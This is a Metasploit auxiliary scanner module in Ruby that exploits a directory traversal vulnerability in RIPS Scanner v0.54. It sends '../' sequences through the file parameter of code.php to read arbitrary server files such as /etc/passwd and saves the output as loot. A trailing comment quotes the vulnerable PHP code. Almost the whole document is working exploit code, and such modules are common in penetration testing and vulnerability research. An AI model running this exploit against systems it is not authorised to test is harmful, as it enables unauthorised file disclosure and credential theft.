## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner def initialize(info = {}) super(update_info(info, 'Name' => 'RIPS Scanner Directory Traversal', 'Description' => %q{ This module exploits a directory traversal vulnerability in the RIPS Scanner v0.54, allowing to read arbitrary files with the web server privileges. }, 'References' => [ ['EDB', '18660'], ['URL', 'http://codesec.blogspot.com.br/2015/03/rips-scanner-v-054-local-file-include.html'] ], 'Author' => [ 'localh0t', # Vulnerability discovery 'Roberto Soares Espreto ' # Metasploit module ], 'License' => MSF_LICENSE )) register_options( [ Opt::RPORT(80), OptString.new('TARGETURI', [ true, "The URI path to the web application", "/rips/"]), OptString.new('FILEPATH', [true, "The path to the file to read", "/etc/passwd"]), OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 5 ]) ], self.class) end def run_host(ip) traversal = "../" * datastore['DEPTH'] filename = datastore['FILEPATH'] filename = filename[1, filename.length] if filename =~ /^\// res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'windows', 'code.php'), 'vars_get' => { 'file' => "#{traversal}#{filename}" } }) if res && res.code == 200 && res.headers.include?('Set-Cookie') && res.body.length > 304 html = Nokogiri::HTML(res.body) html_clean = html.search('.codeline').text print_line("#{html_clean}") fname = datastore['FILEPATH'] path = store_loot( 'rips.traversal', 'text/plain', ip, html_clean, fname ) print_good("File saved in: #{path}") else print_error("Nothing was downloaded") end end end =begin 102 $file = $_GET['file']; 103 $marklines = explode(',', $_GET['lines']); 104 105 106 if(!empty($file)) 107 { 108 $lines = file($file); 109 110 // place line numbers in extra table for more elegant copy/paste without line numbers 111 echo ''; 112 for($i=1, $max=count($lines); $i<=$max;$i++) 113 echo "'; 114 echo '
$i
'; 115 116 $in_comment = false; 117 for($i=0; $i<$max; $i++) 118 { 119 $in_comment = highlightline($lines[$i], $i+1, $marklines, $in_comment); 120 } 121 } =end